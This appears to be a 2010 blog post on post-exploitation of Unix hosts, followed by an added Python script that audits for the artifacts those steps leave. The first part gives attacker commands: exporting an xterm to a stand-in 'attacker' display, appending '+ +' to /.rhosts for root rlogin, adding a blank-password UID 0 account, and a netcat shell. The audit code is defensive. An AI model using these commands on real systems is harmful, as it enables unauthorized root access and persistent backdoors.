Sunday, October 31, 2010

Unix

If you have found a way to execute a command on a Unix box but port 23 is not open, don't despair: you can try to export an xterm to your own box (assuming that you are running an X server and do not block incoming traffic on port 6000).
> xhost +victim
> your_exploit victim "/usr/X11R6/bin/xterm -display attacker:0.0&"
The command above will export an xterm to your server (provided that xterm is located in /usr/X11R6/bin).
Say you want to rlogin to the host instead; you can modify the relevant file so that rlogin is allowed:
> your_exploit victim "echo + + >> /.rhosts"
> rlogin -l root victim
The possibilities are endless. You might want to add a UID 0, GID 0 user to the password file with a blank password, then telnet in and become root. Once you can execute a command on a Unix host, there should be no reason not to be able to compromise the host.
We are assuming that the command is executed with "root" rights. If this is not the case, things get slightly more difficult. Keep in mind that normal users cannot have processes that listen on ports lower than 1024. If you plan to spawn a shell with netcat, make sure it listens on a port higher than 1024.
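Every technique above leaves an artifact a defender can look for: a wildcard entry in .rhosts, a second UID 0 account, an empty password field, or an X server accepting connections on TCP 6000+. The following audit script is an added example written for this page from the defender's side; it is not part of the original post. All input data is constructed inline (the socket listing mimics the column layout of `ss -ltn`, which is an assumption about the format you would feed it), so it runs offline; point the functions at the real files and listing output on a host you administer.

```python
"""Audit checks for the post-exploitation artifacts described above.

Each function takes file or command text as a string and returns the
offending entries, so the checks can be run against live hosts or
against files collected during an incident.
"""

# --- constructed sample inputs (not from any real host) ---
SAMPLE_RHOSTS = "# trusted hosts\nbuildhost alice\n+ +\n"
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "alice:x:1000:1000::/home/alice:/bin/sh\n"
    "toor::0:0::/:/bin/sh\n"          # extra UID 0 account, blank password
)
SAMPLE_SHADOW = (
    "root:$6$salt$hash:18000:0:99999:7:::\n"
    "alice:$6$salt$hash2:18000:0:99999:7:::\n"
)
# Assumed to follow the column layout of `ss -ltn`: State Recv-Q Send-Q Local Peer
SAMPLE_SS = (
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
    "LISTEN 0      128    0.0.0.0:22         0.0.0.0:*\n"
    "LISTEN 0      128    0.0.0.0:6000       0.0.0.0:*\n"   # X server open to the network
    "LISTEN 0      128    127.0.0.1:6010     0.0.0.0:*\n"   # SSH X forwarding, loopback only
    "LISTEN 0      128    [::]:6001          [::]:*\n"
)


def find_rhosts_wildcards(rhosts_text):
    """Return .rhosts lines that trust any host ('+') or any user ('+ +')."""
    hits = []
    for line in rhosts_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0] == "+" or (len(fields) > 1 and fields[1] == "+"):
            hits.append(line.strip())
    return hits


def _passwd_records(text):
    """Yield colon-separated records, skipping blank and comment lines."""
    for line in text.splitlines():
        if line and not line.startswith("#"):
            yield line.split(":")


def find_extra_uid0(passwd_text):
    """Return account names other than 'root' whose UID is 0."""
    return [f[0] for f in _passwd_records(passwd_text)
            if len(f) >= 3 and f[2] == "0" and f[0] != "root"]


def find_blank_passwords(passwd_text, shadow_text):
    """Return accounts whose password field is empty in passwd or shadow.

    An 'x' in passwd means the hash lives in shadow and is not a finding.
    """
    blank = set()
    for text in (passwd_text, shadow_text):
        for f in _passwd_records(text):
            if len(f) >= 2 and f[1] == "":
                blank.add(f[0])
    return sorted(blank)


def find_x11_listeners(ss_text, wildcard_hosts=("0.0.0.0", "::", "[::]", "*")):
    """Return local sockets in the X11 range (6000-6063) bound to all interfaces."""
    hits = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        host, _, port = fields[3].rpartition(":")
        if port.isdigit() and 6000 <= int(port) <= 6063 and host in wildcard_hosts:
            hits.append(fields[3])
    return hits


def audit(rhosts_text, passwd_text, shadow_text, ss_text):
    """Run all checks and return a dict of findings (empty lists mean clean)."""
    return {
        "rhosts_wildcards": find_rhosts_wildcards(rhosts_text),
        "extra_uid0": find_extra_uid0(passwd_text),
        "blank_passwords": find_blank_passwords(passwd_text, shadow_text),
        "x11_listeners": find_x11_listeners(ss_text),
    }


if __name__ == "__main__":
    for check, findings in audit(SAMPLE_RHOSTS, SAMPLE_PASSWD,
                                 SAMPLE_SHADOW, SAMPLE_SS).items():
        print(f"{check}: {findings or 'clean'}")
```

The X11 check deliberately ignores loopback-bound sockets such as 127.0.0.1:6010, which is what SSH X forwarding creates, and flags only the wildcard binds that a remote "-display attacker:0.0" would need. Modern X servers default to -nolisten tcp, so a wildcard 6000 listener on a server is worth a second look regardless of the other findings.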
